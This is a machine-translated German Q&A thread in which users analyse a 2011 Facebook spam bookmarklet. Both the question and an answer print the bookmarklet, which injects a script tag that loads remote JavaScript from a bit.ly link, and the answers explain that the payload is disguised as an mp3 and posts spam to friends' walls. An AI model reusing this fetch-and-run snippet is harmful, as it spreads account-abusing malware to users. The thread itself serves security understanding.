Erklärung von Facebook-spam-code

So, ich habe gerade gesehen, diese spam-code auf Facebook, geschrieben in JavaScript und ich fragte mich, ob jemand könnte mir erklären, wie der code funktioniert, und interagiert mit Facebook. Ich habe nicht vor, verwenden Sie diese für bösartige Zwecke, aber ich bin einfach daran interessiert, die Sicherheit von Webseiten wie Facebook. Hier ist der code, der ausgeführt wird, aus der Adressleiste (ich schlage vor, nicht zu versuchen es selbst, können Sie am Ende mit ein paar Freunde genervt).

javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM  ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
  • Es injiziert ein script-tag in das DOM whos Quelle geholt wird, von einer anderen web-site.
InformationsquelleAutor James | 2011-06-05
  1. 3

    Überprüfen Sie es hier, der link ist url-kodiert.:

    http://meyerweb.com/eric/tools/dencoder/

    javascript:

    a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)

    Was ich sehe: laden Sie diese url ein Skript und fügen Sie es auf der aktuellen Seite.

    Edit:
    Das script geladen wird, platziert Sie unter der url: http://www.raxarstudios.com/x/audiotrack2.mp3

    Es ist maskerierten als ein mp3-song, aber es ist nur javascript: http://pastebin.com/RVmNVtt9
    Ich habe schnell musterte es, es offenbar nutzt einige schwere ajax, um Ereignisse hinzufügen und beitreten Sie sich zu ihm.

    • Interessanterweise, wenn Sie eine neue + auf den bitly-link erhalten Sie eine Seite mit Statistiken, die zeigen, wie viele Leute geladen, der link (etwa 4.000), die bit.ly Benutzername des Urhebers (draze) und wo geht der link (mp3-Audiotrack)
    • Ah, sehr nützliche Tipps von Euch beiden, danke! Ich gehe davon aus, dass das Skript codiert als MP3-Datei, würde diese Annahme richtig sein? Mir ist auch aufgefallen, dass 92% des traffic von Facebook, die übereinstimmen würden mit dieser spam-script.
    • Dieser link enthält eine "mp3", die Sie öffnen in einem text-editor, um zu sehen Sie den code. Sieht nicht aus wie es hat alles Lust, nur macht einige POST-requests an facebook (das sollte nur funktionieren, wenn Sie auf facebook, wenn Sie geben Sie diesem link). Hat nichts zu tun mit der Sicherheit von Facebook, da gibt es nicht eine ganze Menge Sie tun können, über Sie gehen aus dem Weg, um manuell ausführen, die schädliche javascript -...
    • Das Skript selbst ist nur in einfachem javascript. Aber die meisten Browser erhalten Sie mit einem mp3-mime-header-und nicht erkennen, es als javascript. Wenn Sie es herunterladen, werden Sie sehen, dass es nur eine nur-text-Schrift.
    • Die SWF-Dateien (veröffentlicht auf der Opfer-Wand) befinden sich auf einem Photobucket-account gehörenden 'Drazaxa', diese sorgen für ein fake-video und kopieren Sie auch das erste script in die Zwischenablage zu kopieren, die wiederum links auf das Skript getarnt als MP3-Datei. Die MP3-Datei Erlös post 'video' auf Freund Wänden. Vielen Dank für die Hilfe dabei.
    • hier ist die Informationen: bit.ly/FB1337+ (hinzufügen, auf das plus, um finden Sie in der info)
    • Ja, aber einfügen diesen code in die URL textBox kann gefährlich sein, wenn das Ziel-Skript, das ausgeführt wurde kodiert zu senden, um die Besitzer einige Besuchers cookies.

    InformationsquelleAutor Arend
Schreibe einen Kommentar